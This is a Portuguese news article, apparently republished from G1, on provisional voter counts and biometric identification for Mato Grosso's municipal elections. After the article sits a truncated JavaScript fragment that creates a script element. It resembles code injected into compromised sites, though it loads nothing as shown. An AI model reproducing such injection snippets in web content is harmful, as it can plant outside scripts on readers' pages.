Capa / Cidades / Mais de 2,2 milhões de devem ir às urnas em outubro em Mato Grosso

Mais de 2,2 milhões de devem ir às urnas em outubro em Mato Grosso

G1 

Mais de 2,2 milhões de eleitores das 141 cidades mato-grossenses devem ir às urnas nas eleições municipais deste ano no estado. De acordo com dados do Tribunal Regional Eleitoral de Mato Grosso (TRE-MT), o maior número de eleitores está em Cuiabá, Várzea Grande (região metropolitana), Rondonópolis e Sinop. As eleições municipais estão previstas para ocorrer no dia 2 de outubro, primeiro domingo do mês.

Caso vá para o segundo turno, a previsão é que a votação ocorra no dia 30 de outubro, último domingo do mês. Segundo o TRE-MT, o quantitativo é provisório e pode sofrer variações. Ainda existem alguns requerimentos de alistamento eleitoral, transferências e regularização de suspensão que estão no batimento nacional – realizado pelo Tribunal Superior Eleitoral (TSE) e ainda não foram contabilizados. O quantitativo oficial será divulgado em julho.

Os dados provisórios apontam que o maior colégio de eleitores está em Cuiabá, com 414.461, seguido por Várzea Grande, que conta hoje com 183.711 cidadãos aptos a votar; Rondonópolis com 145.229 e Sinop que conta com 88.342 eleitores cadastrados.

Nas eleições deste ano o eleitor deverá escolher os representantes nos seguintes cargos: prefeito, vice-prefeito e vereador.

Biometria
As eleições municipais deste ano acontecerão de forma híbrida em doze municípios mato-grossenses. Em Alta Floresta, Alto Araguaia, Arenápolis, Barão de Melgaço, Barra do Garças, Cáceres, Cuiabá, Mirassol D’Oeste, Sinop, Sorriso, Tangará da Serra e Várzea Grande a biometria não atingiu 100% dos eleitores e, sendo assim, aqueles que ainda não tiveram seus dados cadastrados biometricamente serão identificados por meio de um documento oficial com foto.

Os que já foram cadastrados serão identificados com o leitor de digitais. A Justiça Eleitoral colheu os dados biométricos de 132.499 eleitores destes doze munícios. Após as eleições deste ano, quando o cadastro nacional de eleitores for reaberto, o Tribunal Regional Eleitoral de Mato Grosso dará início aos trabalhos para colher os dados biométricos dos outros 858.015 eleitores vinculados a estas cidades.

 var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top